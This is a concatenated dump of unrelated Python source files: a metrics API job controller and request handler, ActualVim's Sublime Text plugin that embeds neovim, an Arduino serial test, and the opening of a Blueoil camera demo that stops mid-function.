                                     '\n\tCOHORT = {0} - METRIC = {1}'
                          .format(req_item['cohort_expr'], req_item['metric']))
        except Exception as e:
            # Queue was empty for QUEUE_WAIT seconds; fall through so the
            # job and wait queues below still get serviced.
            req_item = None
            #logging.debug('{0} :: {1} - Listening ...'
            #.format(__name__, job_control.__name__))

        # Process complete jobs
        # ---------------------
        for job_item in job_queue:
            # Look for completed jobs
            if not job_item.queue.empty():
                # Put request creds on res queue -- this goes to
                # response_handler asynchronously
                response_queue.put(unpack_fields(job_item.request),
                                   block=True)
                # Pull data off of the queue and add it to response queue
                while not job_item.queue.empty():
                    data = job_item.queue.get(True)
                    if data:
                        response_queue.put(data, block=True)
                # NOTE(review): deleting from the list being iterated is
                # only safe if at most one job completes per pass -- confirm.
                del job_queue[job_queue.index(job_item)]
                concurrent_jobs -= 1
                logging.debug(log_name + ' :: RUN -> RESPONSE - Job ID {0}' \
                                         '\n\tConcurrent jobs = {1}'
                              .format(str(job_item.id), concurrent_jobs))

        # Process pending jobs
        # --------------------
        for wait_req in wait_queue:
            if concurrent_jobs <= MAX_CONCURRENT_JOBS:
                # prepare job from item
                req_q = Queue()
                proc = Process(target=process_metrics, args=(req_q, wait_req))
                proc.start()
                job_item = job_item_type(job_id, proc, wait_req, req_q)
                job_queue.append(job_item)
                del wait_queue[wait_queue.index(wait_req)]
                concurrent_jobs += 1
                job_id += 1
                logging.debug(log_name + ' :: WAIT -> RUN - Job ID {0}' \
                                         '\n\tConcurrent jobs = {1}, ' \
                                         'COHORT = {2} - METRIC = {3}'\
                              .format(str(job_id), concurrent_jobs,
                                      wait_req.cohort_expr, wait_req.metric))

        # Add newest job to the queue
        # ---------------------------
        if req_item and concurrent_jobs <= MAX_CONCURRENT_JOBS:
            # Build the request item
            rm = rebuild_unpacked_request(req_item)
            logging.debug(log_name + ' : REQUEST -> WAIT ' \
                                     '\n\tCOHORT = {0} - METRIC = {1}'
                          .format(rm.cohort_expr, rm.metric))
            wait_queue.append(rm)
    # Unreachable: the loop above never breaks.
    logging.debug('{0} - FINISHING.'.format(log_name))
def process_metrics(p, request_meta):
    """
    Worker process for requests, forked from the job controller. This
    method handles:

        * Filtering cohort type: "regular" cohort, single user, user group
        * Secondary validation
        * Running the metric and writing the stringified result onto the
          queue ``p`` in MAX_BLOCK_SIZE chunks

    Parameters
    ~~~~~~~~~~
    p : multiprocessing.Queue
        Receives the (possibly chunked) result string, or an error
        message when validation or processing fails.
    request_meta :
        Unpacked request attributes (cohort_expr, metric, project, ...).
    """
    log_name = '{0} :: {1}'.format(__name__, process_metrics.__name__)
    logging.info(log_name + ' - START JOB'
                            '\n\tCOHORT = {0} - METRIC = {1}'
                            ' - PID = {2})'.
                 format(request_meta.cohort_expr, request_meta.metric, getpid()))
    err_msg = __name__ + ' :: Request failed.'
    users = list()

    # obtain user list - handle the case where a lone user ID is passed
    # !! The username should already be validated
    if request_meta.is_user:
        uid = MediaWikiUser.is_user_name(request_meta.cohort_expr,
                                         request_meta.project)
        if uid:
            valid = True
            users = [uid]
        else:
            valid = False
            err_msg = error_codes[3]
    # The "all" user group. All users within a time period.
    elif request_meta.cohort_expr == 'all':
        users = MediaWikiUser(query_type=1)
        try:
            users = [u for u in users.get_users(
                request_meta.start, request_meta.end,
                project=request_meta.project)]
            valid = True
        except Exception:
            valid = False
            err_msg = error_codes[5]
    # "TYPICAL" COHORT PROCESSING
    else:
        users = get_users(request_meta.cohort_expr)
        # Default project is what is stored in usertags_meta
        project = query_mod.get_cohort_project_by_meta(
            request_meta.cohort_expr)
        request_meta.project = project
        logging.debug(__name__ + ' :: Using default project from ' \
                                 'usertags_meta {0}.'.format(project))
        valid = True
        err_msg = ''

    if valid:
        # process request
        results = process_data_request(request_meta, users)
        results = str(results)
        response_size = getsizeof(results, None)
        if response_size > MAX_BLOCK_SIZE:
            index = 0
            # Dump the data in pieces - block until it is picked up
            while index < response_size:
                p.put(results[index:index+MAX_BLOCK_SIZE], block=True)
                index += MAX_BLOCK_SIZE
        else:
            p.put(results, block=True)
        logging.info(log_name + ' - END JOB'
                                '\n\tCOHORT = {0} - METRIC = {1}'
                                ' - PID = {2})'.
                     format(request_meta.cohort_expr, request_meta.metric, getpid()))
    else:
        p.put(err_msg, block=True)
        logging.info(log_name + ' - END JOB - FAILED.'
                                '\n\tCOHORT = {0} - METRIC = {1}'
                                ' - PID = {2})'.
                     format(request_meta.cohort_expr, request_meta.metric, getpid()))
# REQUEST FLOW HANDLER
# ###################
from dateutil.parser import parse as date_parse
from copy import deepcopy
from user_metrics.etl.data_loader import DataLoader
import user_metrics.metrics.user_metric as um
import user_metrics.etl.time_series_process_methods as tspm
from user_metrics.api.engine.request_meta import ParameterMapping
from user_metrics.api.engine.response_meta import format_response
from user_metrics.api.engine import DATETIME_STR_FORMAT
from user_metrics.api.engine.request_meta import get_agg_key, \
get_aggregator_type, request_types
INTERVALS_PER_THREAD = 10
MAX_THREADS = 5
USER_THREADS = settings.__user_thread_max__
REVISION_THREADS = settings.__rev_thread_max__
DEFAULT_INERVAL_LENGTH = 24
# create shorthand method refs
to_string = DataLoader().cast_elems_to_string
def process_data_request(request_meta, users):
    """
    Main entry point of the module, prepares results for a given request.

    Coordinates one of three top-level request types based on the response
    type produced by ``format_response``: time series, aggregate, or raw.

    Parameters
    ~~~~~~~~~~
    request_meta :
        Request attributes; ``interval`` (hours), ``aggregator``, and the
        metric/time bounds are consumed here.
    users : list
        List of user IDs the metric is computed over.

    Returns the ``results`` dict with 'header' and 'data' populated, or
    with 'data' set to an error string on failure.
    """
    # Set interval length in hours if not present
    if not request_meta.interval:
        request_meta.interval = DEFAULT_INERVAL_LENGTH
    else:
        request_meta.interval = float(request_meta.interval)

    # Get the aggregator key
    agg_key = get_agg_key(request_meta.aggregator, request_meta.metric) if \
        request_meta.aggregator else None

    args = ParameterMapping.map(request_meta)

    # Initialize the results
    results, metric_class, metric_obj = format_response(request_meta)

    start = metric_obj.datetime_start
    end = metric_obj.datetime_end

    if results['type'] == request_types.time_series:
        # Get aggregator
        try:
            aggregator_func = get_aggregator_type(agg_key)
        except MetricsAPIError as e:
            results['data'] = 'Request failed. ' + e.message
            return results

        # Determine intervals and thread allocation
        total_intervals = (date_parse(end) - date_parse(start)).\
            total_seconds() / (3600 * request_meta.interval)
        time_threads = max(1, int(total_intervals / INTERVALS_PER_THREAD))
        time_threads = min(MAX_THREADS, time_threads)

        logging.info(__name__ + ' :: Initiating time series for %(metric)s\n'
                                '\tAGGREGATOR = %(agg)s\n'
                                '\tFROM: %(start)s,\tTO: %(end)s.' %
                     {
                         'metric': metric_class.__name__,
                         'agg': request_meta.aggregator,
                         'start': str(start),
                         'end': str(end),
                     })
        metric_threads = '"k_" : {0}, "kr_" : {1}'.format(USER_THREADS,
                                                          REVISION_THREADS)
        metric_threads = '{' + metric_threads + '}'

        # The time-series builder takes only metric parameters as kwargs.
        new_kwargs = deepcopy(args)
        del new_kwargs['interval']
        del new_kwargs['aggregator']
        del new_kwargs['datetime_start']
        del new_kwargs['datetime_end']

        out = tspm.build_time_series(start,
                                     end,
                                     request_meta.interval,
                                     metric_class,
                                     aggregator_func,
                                     users,
                                     kt_=time_threads,
                                     metric_threads=metric_threads,
                                     log=True,
                                     **new_kwargs)

        results['header'] = ['timestamp'] + \
            getattr(aggregator_func,
                    um.METRIC_AGG_METHOD_HEAD)
        for row in out:
            timestamp = date_parse(row[0][:19]).strftime(
                DATETIME_STR_FORMAT)
            results['data'][timestamp] = row[3:]

    elif results['type'] == request_types.aggregator:
        # Get aggregator
        try:
            aggregator_func = get_aggregator_type(agg_key)
        except MetricsAPIError as e:
            results['data'] = 'Request failed. ' + e.message
            return results

        # BUG FIX: '\AGGREGATOR' left a literal backslash in the log line;
        # '\t' matches the time-series branch above.
        logging.info(__name__ + ' :: Initiating aggregator for %(metric)s\n'
                                '\tAGGREGATOR = %(agg)s\n'
                                '\tFROM: %(start)s,\tTO: %(end)s.' %
                     {
                         'metric': metric_class.__name__,
                         'agg': request_meta.aggregator,
                         'start': str(start),
                         'end': str(end),
                     })
        try:
            metric_obj.process(users,
                               k_=USER_THREADS,
                               kr_=REVISION_THREADS,
                               log_=True,
                               **args)
        except UserMetricError as e:
            logging.error(__name__ + ' :: Metrics call failed: ' + str(e))
            results['data'] = str(e)
            return results

        r = um.aggregator(aggregator_func, metric_obj, metric_obj.header())
        results['header'] = to_string(r.header)
        results['data'] = r.data[1:]

    elif results['type'] == request_types.raw:
        # BUG FIX: missing space made the log read 'module:: Initiating'.
        logging.info(__name__ + ' :: Initiating raw request for %(metric)s\n'
                                '\tFROM: %(start)s,\tTO: %(end)s.' %
                     {
                         'metric': metric_class.__name__,
                         'start': str(start),
                         'end': str(end),
                     })
        try:
            metric_obj.process(users,
                               k_=USER_THREADS,
                               kr_=REVISION_THREADS,
                               log_=True,
                               **args)
        except UserMetricError as e:
            logging.error(__name__ + ' :: Metrics call failed: ' + str(e))
            results['data'] = str(e)
            return results

        for m in metric_obj.__iter__():
            results['data'][m[0]] = m[1:]

    return results
# REQUEST NOTIFICATIONS
# #####################
from collections import OrderedDict
req_notification_queue_in = Queue()
req_notification_queue_out = Queue()
request_msg_type = namedtuple('RequestMessage', 'type hash url is_alive')
def requests_notification_callback(msg_queue_in, msg_queue_out):
    """
    Asynchronous callback. Tracks status of requests and new requests.

    Runs forever consuming typed messages from ``msg_queue_in``:

        0 - register a request (hash, url) as alive
        1 - mark a request finished (entry stays in the cache)
        2 - reply on ``msg_queue_out`` whether a request is alive
        3 - reply with all cached request keys
        4 - reply with the url stored for a request

    ``cache`` maps request hash -> [is_alive, url].
    """
    log_name = '{0} :: {1}'.format(__name__,
                                   requests_notification_callback.__name__)
    logging.debug('{0} - STARTING...'.format(log_name))
    cache = OrderedDict()
    while 1:
        try:
            msg = msg_queue_in.get(True)
        except IOError as e:
            logging.error(__name__ + ' :: Could not block '
                                     'on in queue: "{0}"'.format(e.message))
            sleep(1)
            continue
        try:
            # Renamed from `type`, which shadowed the builtin.
            msg_type = msg[0]
        except (KeyError, ValueError):
            logging.error(log_name + ' - No valid type ' \
                                     '{0}'.format(str(msg)))
            continue
        # Init request
        if msg_type == 0:
            try:
                cache[msg[1]] = [True, msg[2]]
                logging.debug(log_name + ' - Initialize Request: ' \
                                         '{0}.'.format(str(msg)))
            except Exception:
                logging.error(log_name + ' - Initialize Request' \
                                         ' failed: {0}'.format(str(msg)))
        # Kill request - leave on cache
        elif msg_type == 1:
            try:
                cache[msg[1]][0] = False
                logging.debug(log_name + ' - Set request finished: ' \
                                         '{0}.\n'.format(str(msg)))
            except Exception:
                logging.error(log_name + ' - Set request finished failed: ' \
                                         '{0}\n'.format(str(msg)))
        # Is the key in the cache and running?
        elif msg_type == 2:
            try:
                if msg[1] in cache:
                    msg_queue_out.put([cache[msg[1]][0]], True)
                else:
                    msg_queue_out.put([False], True)
                logging.debug(log_name + ' - Get request alive: ' \
                                         '{0}.'.format(str(msg)))
            except (KeyError, ValueError):
                logging.error(log_name + ' - Get request alive failed: ' \
                                         '{0}'.format(str(msg)))
        # Get keys
        elif msg_type == 3:
            msg_queue_out.put(cache.keys(), True)
        # Get url
        elif msg_type == 4:
            try:
                if msg[1] in cache:
                    msg_queue_out.put([cache[msg[1]][1]], True)
                else:
                    logging.error(log_name + ' - Get URL failed: {0}'.
                                  format(str(msg)))
            except (KeyError, ValueError):
                logging.error(log_name + ' - Get URL failed: {0}'.format(str(msg)))
        else:
            logging.error(log_name + ' - Bad message: {0}'.format(str(msg)))
    # Unreachable: the loop above never breaks.
    logging.debug('{0} - SHUTTING DOWN...'.format(log_name))
# Wrapper Methods for working with Request Notifications
# Use locks to enforce atomicity
BLOCK_TIMEOUT = 1
def req_cb_get_url(key, lock):
    """
    Return the stored URL for request ``key`` ('' on timeout).

    Serialized with ``lock`` so concurrent callers cannot interleave their
    request/response pairs on the notification queues.
    """
    lock.acquire()
    try:
        req_notification_queue_in.put([4, key], block=True)
        try:
            val = req_notification_queue_out.get(True, timeout=BLOCK_TIMEOUT)[0]
        except Empty:
            logging.error(__name__ + ' :: req_cb_get_url -'
                                     ' Block time expired.')
            return ''
    finally:
        # BUG FIX: the original returned on timeout WITHOUT releasing the
        # lock, deadlocking every subsequent caller.
        lock.release()
    return val
def req_cb_get_cache_keys(lock):
    """
    Return the list of cached request keys ([] on timeout).

    Serialized with ``lock`` so concurrent callers cannot interleave their
    request/response pairs on the notification queues.
    """
    lock.acquire()
    try:
        req_notification_queue_in.put([3], block=True)
        try:
            val = req_notification_queue_out.get(block=True,
                                                 timeout=BLOCK_TIMEOUT)
        except Empty:
            logging.error(__name__ + ' :: req_cb_get_cache_keys -'
                                     ' Block time expired.')
            return []
    finally:
        # BUG FIX: the original returned on timeout WITHOUT releasing the
        # lock, deadlocking every subsequent caller.
        lock.release()
    return val
def req_cb_get_is_running(key, lock):
    """
    Return whether request ``key`` is alive (False on timeout or unknown).

    Serialized with ``lock`` so concurrent callers cannot interleave their
    request/response pairs on the notification queues.
    """
    lock.acquire()
    try:
        req_notification_queue_in.put([2, key], True)
        try:
            val = req_notification_queue_out.get(block=True,
                                                 timeout=BLOCK_TIMEOUT)[0]
        except Empty:
            logging.error(__name__ + ' :: req_cb_get_is_running -'
                                     ' Block time expired.')
            return False
    finally:
        # BUG FIX: the original returned on timeout WITHOUT releasing the
        # lock, deadlocking every subsequent caller.
        lock.release()
    return val
def req_cb_add_req(key, url, lock):
    """Register a new request ``key`` with its result ``url`` (type-0 message)."""
    with lock:
        req_notification_queue_in.put([0, key, url])
neo.py | import contextlib
import os
import queue
import sublime
import sys
import threading
import time
import traceback
from .lib import neovim
from .lib import util
from . import settings
from .screen import Screen
# os.environ['NVIM_LOG_FILE'] = '/Users/aegis/.nvimlog'
if not '_loaded' in globals():
    # Preserve state across Sublime plugin reloads: only reset these on
    # the very first import of this module.
    NEOVIM_PATH = None
    _loaded = False
    _loading = False

# Mode characters as reported by nvim; '\x16' is CTRL-V (visual block).
INSERT_MODES = ['i', 'R']
VISUAL_MODES = ['V', 'v', '\x16']
MODES = {
    'n': 'normal',
    'c': 'command',
    # ex mode goes and stays "not ready"
    # think I need UI hook to support it for now
    'i': 'insert',
    'R': 'replace',
    'v': 'visual',
    'V': 'visual line',
    '\x16': 'visual block',
    # TODO: select, vreplace?
}
def plugin_loaded():
    """
    Sublime Text entry point: locate the nvim binary, start an embedded
    nvim instance, and notify the view layer once it is ready.

    Raises Exception when no nvim executable can be found.
    """
    global NEOVIM_PATH
    settings.load()
    NEOVIM_PATH = sublime.load_settings('ActualVim.sublime-settings').get('neovim_path')
    if not NEOVIM_PATH:
        NEOVIM_PATH = util.which('nvim')

    if sys.platform == 'win32':
        if not NEOVIM_PATH:
            candidates = [
                r'C:\Program Files\Neovim',
                r'C:\Program Files (x86)\Neovim',
                r'C:\Neovim',
            ]
            chocoroot = os.getenv('ChocolateyBinRoot')
            # BUG FIX: os.path.join discards all preceding components when a
            # later one starts with a path separator, so the original
            # join(chocoroot, r'\neovim\Neovim') silently ignored chocoroot.
            if chocoroot:
                candidates.insert(0, os.path.join(chocoroot, r'neovim\Neovim'))
            else:
                candidates.insert(0, r'C:\tools\neovim\Neovim')
            for c in candidates:
                path = os.path.join(c, r'bin\nvim.exe')
                if os.path.exists(path):
                    NEOVIM_PATH = path
                    break
        elif os.path.isdir(NEOVIM_PATH):
            # A directory was configured; look for the executable inside it.
            for c in [r'bin\nvim.exe', 'nvim.exe']:
                path = os.path.join(NEOVIM_PATH, c)
                if os.path.exists(path):
                    NEOVIM_PATH = path
                    break
            else:
                NEOVIM_PATH = None

    if not NEOVIM_PATH:
        raise Exception('cannot find nvim executable')
    print('ActualVim: using nvim binary path:', NEOVIM_PATH)

    global vim, _loaded, _loading
    try:
        start = time.time()
        vim = Vim()
        _loading = True
        vim._setup()
        _loaded = True
        _loading = False
        from .view import neovim_loaded
        neovim_loaded()
        print('ActualVim: nvim started in {:.2f}ms'.format((time.time() - start) * 1000))
    except Exception:
        print('ActualVim: Error during nvim setup.')
        traceback.print_exc()
        _loaded = False
        _loading = False
        # Unbind the global entirely so later code sees it as missing.
        vim = None
        del vim
def plugin_unloaded():
    """Sublime Text exit hook: tear down views and quit the embedded nvim."""
    from .view import neovim_unloaded
    neovim_unloaded()
    global vim, _loaded
    if _loaded:
        # NOTE(review): `async` became a reserved word in Python 3.7 and the
        # neovim client renamed this kwarg to `async_` -- confirm the target
        # runtime (Sublime's bundled Python) before changing this.
        vim.nv.command('qa!', async=True)
        vim = None
        _loaded = False
class Vim:
    """
    Wrapper around a single embedded neovim instance.

    Owns the msgpack-RPC session (``nv``), the rendered Screen, and the
    mapping from nvim buffer numbers to ActualVim views. Most methods proxy
    commands/evals to nvim; ``ready`` guards against issuing commands while
    nvim is blocked waiting for more input.
    """
    def __init__(self, nv=None):
        # nv: neovim session; attached lazily in _setup() when not supplied.
        self.nv = nv
        # Held while nvim is "not ready" (blocked on partial input).
        self.ready = threading.Lock()
        self.status_lock = threading.Lock()
        self.status_last = {}      # last polled status() snapshot
        self.status_dirty = True   # set after keypresses; forces a re-poll
        self.av = None             # currently active ActualVim view
        self.width = 80
        self.height = 24

    def _setup(self):
        """Spawn nvim, attach the UI, and install autocmds/RPC hooks."""
        self.screen = Screen()
        self.views = {}
        args = settings.get('neovim_args') or []
        if not isinstance(args, list):
            print('ActualVim: ignoring non-list ({}) args: {}'.format(type(args), repr(args)))
            args = []
        self.nv = neovim.attach('child', argv=[NEOVIM_PATH, '--embed', '-n'] + args)
        # toss in <FocusGained> in case there's a blocking prompt on startup (like vimrc errors)
        self.nv.input('<FocusGained>')
        messages = self.nv.eval('execute("messages")').strip()
        if messages:
            print('ActualVim: nvim startup error:')
            print('-'*20)
            print(messages)
            print('-'*20)
            sublime.active_window().run_command('show_panel', {'panel': 'console'})
        # Semaphore is released by on_setup() once the RPC loop is live.
        self._sem = threading.Semaphore(0)
        self._thread = t = threading.Thread(target=self._event_loop)
        t.daemon = True
        t.start()
        self._sem.acquire()
        # set up UI (before anything else so we can see errors)
        options = {
            'ext_popupmenu': True,
            'ext_cmdline': True,
            'rgb': True,
        }
        self.nv.ui_attach(self.width, self.height, options)
        # hidden buffers allow us to multiplex them
        self.nv.options['hidden'] = True
        # folds aren't implemented
        self.cmd('set nofoldenable')
        rpc_id = self.nv.channel_id
        # set up buffer read/write commands
        cmd = 'autocmd {{}} * :call rpcrequest({}, "{{}}", expand("<abuf>"), expand("<afile>"))'.format(rpc_id)
        # self.cmd(cmd.format('BufWritePre', 'write_pre'))
        self.cmd(cmd.format('BufReadCmd', 'read'))
        self.cmd(cmd.format('BufWriteCmd', 'write'))
        self.cmd(cmd.format('BufEnter', 'enter'))

        def funcdef(prototype, body):
            # Define a vimscript function over RPC.
            self.eval(r'''execute(":function! {} \n {} \n endfunction")'''.format(prototype, body))

        # set up autocomplete from Sublime via completefunc (ctrl-x, ctrl-u)
        # controlled via bufopts['completefunc'] in ActualVim settings
        complete = r'''return rpcrequest({}, \"complete\", bufnr(\"%\"), a:findstart, a:base)'''.format(rpc_id)
        funcdef('ActualVimComplete(findstart, base)', complete)
        # FIXME: these just hang for now
        funcdef('ActualVimWinCmd(name, args)', r'call rpcnotify({}, \"wincmd\", bufnr(\"%\"), a:name, a:args)'.format(rpc_id))
        funcdef('ActualVimTextCmd(name, args)', r'call rpcnotify({}, \"textcmd\", bufnr(\"%\"), a:name, a:args)'.format(rpc_id))
        funcdef('ActualVimAppCmd(name, args)', r'call rpcnotify({}, \"appcmd\", bufnr(\"%\"), a:name, a:args)'.format(rpc_id))
        # Feature-detect nvim_get_mode (newer nvim); press() uses it to know
        # whether nvim is blocked waiting for more input.
        self.nvim_mode = False
        try:
            res = self.nv.request('nvim_get_mode')
            if isinstance(res, dict):
                self.nvim_mode = True
        except neovim.api.NvimError:
            pass

    def _event_loop(self):
        """Run the nvim RPC event loop on a daemon thread."""
        def on_notification(method, data):
            # if vim exits, we might get a notification on the way out
            if not (_loaded or _loading):
                return
            if method == 'redraw':
                for cmd in data:
                    name, args = cmd[0], cmd[1:]
                    # TODO: allow subscribing to these
                    if name == 'bell' and self.av:
                        self.av.on_bell()
                    elif name in ('popupmenu_show', 'popupmenu_hide', 'popupmenu_select'):
                        self.av.on_popupmenu(name, args)
                    elif name in ('cmdline_show', 'cmdline_pos', 'cmdline_special_char', 'cmdline_hide',
                                  'cmdline_block_show', 'cmdline_block_append', 'cmdline_block_hide'):
                        self.av.on_cmdline(name, args)
                vim.screen.redraw(data)
                if self.av:
                    self.av.on_redraw(data, vim.screen)
            elif method == 'nvim_buf_lines_event':
                buf, changedtick, start, end, lines, more = data
                av = self.views.get(buf.number)
                if av:
                    av.on_nvim_lines(changedtick, start, end, lines, more)
            elif method == 'nvim_buf_changedtick_event':
                buf, changedtick = data
                av = self.views.get(buf.number)
                if av:
                    av.on_nvim_changedtick(changedtick)
            elif method == 'appcmd':
                av = self.views.get(data[0])
                if av:
                    av.on_appcmd(data[1], data[2])
            elif method == 'wincmd':
                av = self.views.get(data[0])
                if av:
                    av.on_wincmd(data[1], data[2])
            elif method == 'textcmd':
                av = self.views.get(data[0])
                if av:
                    av.on_textcmd(data[1], data[2])

        def on_request(method, args):
            # TODO: what if I need to handle requests that don't start with bufid?
            bufid = int(args.pop(0))
            av = self.views.get(bufid)
            if not av:
                # TODO: this spews on first "enter"
                print('ActualVim: request "{}" failed: buf:{} has no view'.format(method, bufid))
                return
            if method == 'write':
                # TODO: filename arg?
                return av.on_write()
            elif method == 'read':
                # TODO: filename arg?
                # TODO: pivot view?
                pass
            elif method == 'enter':
                # TODO: focus view?
                pass
            elif method == 'complete':
                return av.on_complete(args[0], args[1])

        def on_setup():
            # Signals _setup() that the loop is live.
            self._sem.release()

        self.nv.run_loop(on_request, on_notification, on_setup)

    def cmd(self, *args, **kwargs):
        """Run an ex command in nvim and return its output."""
        return self.nv.command_output(*args, **kwargs)

    def eval(self, *cmds, **kwargs):
        """Evaluate one expression, or several at once as a vim list."""
        if len(cmds) != 1:
            cmd = '[' + (', '.join(cmds)) + ']'
        else:
            cmd = cmds[0]
        return self.nv.eval(cmd, **kwargs)

    def activate(self, av):
        """Switch nvim to ``av``'s buffer; return True if a switch happened."""
        if self.av != av:
            self.av = av
            self.cmd('b! {:d}'.format(av.buf.number))
            return True
        return False

    # buffer methods
    def buf_new(self, view):
        """Create a new nvim buffer for ``view`` and register it."""
        self.cmd('enew')
        # 'enew' makes the newest (highest-numbered) buffer current.
        buf = max((b.number, b) for b in self.nv.buffers)[1]
        buf.options['buftype'] = 'acwrite'
        for k, v in settings.get('bufopts').items():
            buf.options[k] = v
        self.views[buf.number] = view
        return buf

    def buf_close(self, buf):
        """Unregister and wipe out ``buf`` in nvim."""
        self.views.pop(buf.number, None)
        self.cmd('bw! {:d}'.format(buf.number))

    # neovim 'readiness' methods
    # if you don't use check/force_ready and control your input/cmd interleaving, you'll hang all the time
    def check_ready(self):
        """Return True when nvim is not blocked on pending input."""
        ready = self.ready.acquire(False)
        if ready:
            self.ready.release()
        return ready

    def force_ready(self):
        """Poll briefly for readiness, then force-cancel pending input."""
        for i in range(3):
            if self.check_ready():
                break
            time.sleep(0.0001)
        else:
            # <c-\><c-n> returns nvim to normal mode from any state.
            self.nv.input('<c-\\><c-n>')

    def press(self, key, onready=None):
        """
        Feed ``key`` to nvim; return (input result, ready flag).

        With nvim_get_mode support, readiness is determined synchronously;
        otherwise ``onready`` is invoked later via an async status() poll.
        """
        self.status_dirty = True
        mode_last = self.status_last.get('mode')
        was_ready = self.ready.acquire(False)
        try:
            ret = self.nv.input(key)
        except Exception:
            return 0, False
        if self.nvim_mode:
            res = self.nv.request('nvim_get_mode') or {}
            ready = not res.get('blocking', True)
        else:
            ready = False
            def tmp():
                # need to acquire/release so ready lock doesn't get stuck
                self.ready.acquire(False)
                self.ready.release()
                onready()
            self.status(cb=tmp)
        if ready:
            self.ready.release()
        return ret, ready

    def status(self, update=True, force=False, cb=None):
        """
        Return (and refresh when dirty) the cached nvim status snapshot.

        When ``cb`` is given the refresh happens asynchronously and ``cb``
        runs after the snapshot lands; otherwise the eval is synchronous.
        """
        # TODO: use nvim_atomic? we need to get sel, buf, mode, everything at once if possible
        with self.status_lock:
            if self.status_dirty and update or force:
                # Expression per status field; evaluated in one round trip.
                items = {
                    'mode': 'mode()',
                    'modified': '&modified',
                    'expandtab': '&expandtab',
                    'ts': '&ts',
                    'changedtick': 'getbufvar(bufnr("%"), "changedtick")',
                    'wrap': '&wrap',
                    'cline': 'line(".") - 1',
                    'ccol': 'col(".") - 1',
                    'vline': 'line("v") - 1',
                    'vcol': 'col("v") - 1',
                    'wview': 'winsaveview()',
                    'wwidth': 'winwidth(winnr())',
                    'wheight': 'winheight(winnr())',
                    'screenrow': 'screenrow()',
                    'screencol': 'screencol()',
                }
                expr = '[' + (', '.join(items.values())) + ']'

                # NOTE(review): this inner function shadows the `update`
                # parameter, which was already consumed above.
                def update(*a):
                    self.status_last = dict(zip(items.keys(), a[-1]))
                    self.status_dirty = False
                    if cb:
                        # callbacks aren't decoded automatically
                        self.status_last['mode'] = self.status_last['mode'].decode('utf8')
                        cb()
                if cb:
                    self.eval(expr, cb=update)
                else:
                    update(self.eval(expr))
        return self.status_last

    def setpos(self, expr, line, col):
        """Set cursor/mark position ``expr`` to 1-based (line, col)."""
        return self.eval('setpos("{}", [0, {:d}, {:d}])'.format(expr, line, col))

    def select(self, a, b=None, mode='v'):
        """
        Move the cursor to ``a``, or select from ``a`` to ``b`` in ``mode``.

        Any active visual mode is cancelled first; ``mode`` may be a plain
        visual-mode character or a '<c-...>' special key.
        """
        if b is None:
            if self.mode in VISUAL_MODES:
                self.nv.input('<c-\\><c-n>')
                self.status_dirty = True
            self.eval('cursor({:d}, {:d})'.format(a[0], a[1]))
        else:
            special = mode.startswith('<c-')
            if self.mode in VISUAL_MODES:
                self.nv.input('<c-\\><c-n>')
                self.status_dirty = True
            self.setpos('.', *a)
            if special:
                self.cmd('exe "normal! \\{}"'.format(mode))
            else:
                self.cmd('normal! {}'.format(mode))
            self.setpos('.', *b)

    def resize(self, width, height):
        """Resize the attached UI, skipping no-ops and not-ready states."""
        w, h = int(width), int(height)
        if w and h and (w != self.width or h != self.height) and self.check_ready():
            self.width, self.height = w, h
            self.nv.ui_try_resize(w, h)

    @property
    def mode(self):
        # Current nvim mode character (see MODES).
        return self.status()['mode']

    @property
    def status_line(self):
        # Bottom row of the rendered screen, i.e. nvim's status/cmd line.
        return self.screen[-1].strip()
|
serialcommunication.py | __author__ = 'OSAMA'
# This file tests serial communication with Arduino UNO
# when sending a message of data very quickly; Also,
# examine the initialization flag.
# Imports
import serial
import time
import threading
import socket
def main():
    # All the main code resides here. NOTE: this is Python 2 code
    # (print statements, pyserial's inWaiting/isOpen API).
    def read():
        # Background reader: echo each complete serial line to stdout
        # until interrupted.
        try:
            while True:
                if s.inWaiting() > 0:
                    print s.readline().strip('\n\r')
        except KeyboardInterrupt:
            s.close()
    comport = "COM5"
    baudrate = 115200
    # timeout = 0.1
    # writetimeout = 0.1
    s = serial.Serial(comport,baudrate)
    readthread = threading.Thread(target=read)
    # UDP socket: each datagram received triggers one serial write below.
    sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
    sock.bind(("127.0.0.2",5000))
    while not s.isOpen():
        s.open()
    else:
        print "Serial Port is open"
    time.sleep(2)
    # Fixed test payload, '$'-terminated.
    # NOTE(review): field meanings assumed to be motor commands -- confirm
    # against the Arduino firmware.
    message = "*255,0,-255,0,1$"
    readthread.start()
    try:
        while True:
            r = sock.recvfrom(1024)
            s.write(message)
            # print "sent:", message
    except KeyboardInterrupt:
        s.close()

if __name__ == "__main__":
    main()
usb_camera_demo.py | # -*- coding: utf-8 -*-
# Copyright 2018 The Blueoil Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
import time
import os
import sys
from multiprocessing import Process, Queue
from time import sleep
from collections import deque
import click
import cv2
import numpy as np
from blueoil.common import get_color_map
from lmnet.nnlib import NNLib
from config import (
load_yaml,
build_pre_process,
build_post_process,
)
from lmnet.utils.demo import (
add_rectangle,
add_fps,
run_inference,
)
from blueoil.visualize import (
label_to_color_image,
visualize_keypoint_detection,
)
from blueoil.pre_processor import resize
# Model and pre/post-processing pipeline shared with the inference worker
# process; populated by run() before run_impl() starts.
nn = None
pre_process = None
post_process = None
def init_camera(camera_width, camera_height):
    """Open the default camera and request the given resolution at 60 FPS.

    Supports both the legacy (cv2.cv.CV_CAP_PROP_*) and the modern
    (cv2.CAP_PROP_*) OpenCV property constants.
    """
    vc = cv2.VideoCapture(0)
    if hasattr(cv2, 'cv'):
        capture_props = (
            (cv2.cv.CV_CAP_PROP_FRAME_WIDTH, camera_width),
            (cv2.cv.CV_CAP_PROP_FRAME_HEIGHT, camera_height),
            (cv2.cv.CV_CAP_PROP_FPS, 60),
        )
    else:
        capture_props = (
            (cv2.CAP_PROP_FRAME_WIDTH, camera_width),
            (cv2.CAP_PROP_FRAME_HEIGHT, camera_height),
            (cv2.CAP_PROP_FPS, 60),
        )
    for prop_id, value in capture_props:
        vc.set(prop_id, value)
    return vc
def add_class_label(canvas,
                    text="Hello",
                    font=cv2.FONT_HERSHEY_SIMPLEX,
